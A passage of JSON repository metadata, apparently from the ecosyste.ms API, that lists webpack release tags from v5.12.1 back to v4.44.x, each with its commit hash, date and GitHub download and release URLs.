15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44